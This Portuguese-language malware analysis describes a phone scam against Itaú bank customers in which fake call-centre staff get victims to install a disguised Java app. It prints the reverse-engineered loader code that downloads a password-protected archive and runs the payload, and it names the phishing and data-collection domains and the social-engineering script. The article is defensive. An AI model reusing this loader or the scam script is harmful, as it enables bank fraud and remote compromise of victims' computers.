Além de um malware, um golpe virtual está sendo aplicado através de uma central de atendimento ativa falsa.
Centrais de atendimento ativas normalmente ligam para os clientes para oferecer produtos, para fazer cobranças ou para resolver eventuais problemas dos clientes.
Neste golpe, observamos que a falsa central de atendimento ligava para os clientes do Banco Itaú informando a necessidade de instalar um programa de segurança através do endereço www.itauempresasapp.com. O endereço era passado durante a própria ligação telefônica.
O modo como os falsos funcionários tratam a suposta vítima é fundamental para o ganho de confiança, em um primeiro momento liga um homem dizendo que é funcionário do banco e enfatiza a importância da segurança da informação e é por este motivo que a atualização do aplicativo é necessária e que pelo mesmo motivo de segurança outra pessoa responsável entraria em contato para auxiliar na instalação.
Aqui podemos observar a técnica de Engenharia Social onde ocorre a tentativa de ganho de confiança.
Após algumas horas ocorreu a ligação de uma mulher que se identificou como funcionária do setor de TI e responsável pela instalação do aplicativo, foi neste momento que ela solicitou o acesso a página falsa e a instalação do aplicativo, conforme imagem abaixo.
Considerando a Engenharia Social esta segunda ligação ocorre pelo fato da vítima já estar esperando e ciente do fato, como ela foi bem tratada na primeira, ela tende a confiar mais nas informações da segunda ligação, a falsa funcionária utilizou o nome de uma artista conhecida para que ocorra mais um ganho de confiança e de forma implícita.
Ao acessar o endereço, a página falsa baixa o arquivo Aplicativo.jar que é um programa desenvolvido na linguagem java. Através do uso de engenharia reversa, foi possível identificar que o programa, se executado, iria baixar mais um arquivo compactado e protegido pela senha “102030”, conforme o código abaixo:
private static void executa(String URL, String local, String nome) { try { downloadFile(URL, local + "\\" + nome); zip.UnZip(local + "\\" + nome, local, "102030"); File FileTemp = new File(local + "\\" + nome); FileTemp.delete(); Runtime.getRuntime().exec("cmd /c \"" + local + "\\aplicativo.exe\""); } catch (Exception localException) {} }
Todo este processo realizado pelo malware foi desenvolvimento para dificultar a identificação do malware pelo software de antivírus. Os softwares de antivírus não conseguem abrir um arquivo protegido por senha para fazer uma análise mais completa do artefato.
Analisando o arquivo aplicativo.exe foi identificado que sua função principal é abrir portas para conexão externa no computador da vítima e enviar as informações sobre o nome do usuário, nome do computador e as portas abertas para o endereço www.brtcontrol.com que registra todas as informações e cria um banco de dados de computadores infectados.
Possivelmente este Malware foi criado pela ferramenta SET (Social Engineering Toolkit).
Este golpe é particularmente perigoso, porque conta, além do uso de um software malicioso (malware), uma falsa central de atendimento proporcionando um contato humano para enganar as vítimas.
Marcos Flávio Eli Pereira, pesquisador e estudante de segurança da informação da Fatec de Americana, recomenda que qualquer acesso aos sites de bancos deve ser realizado somente através de computadores confiáveis, atualizados e protegidos por antivírus e firewall. E o mais importante, que sempre seja conferido a autenticidade do site aberto no navegador através da verificação do certificado digital do site do Banco.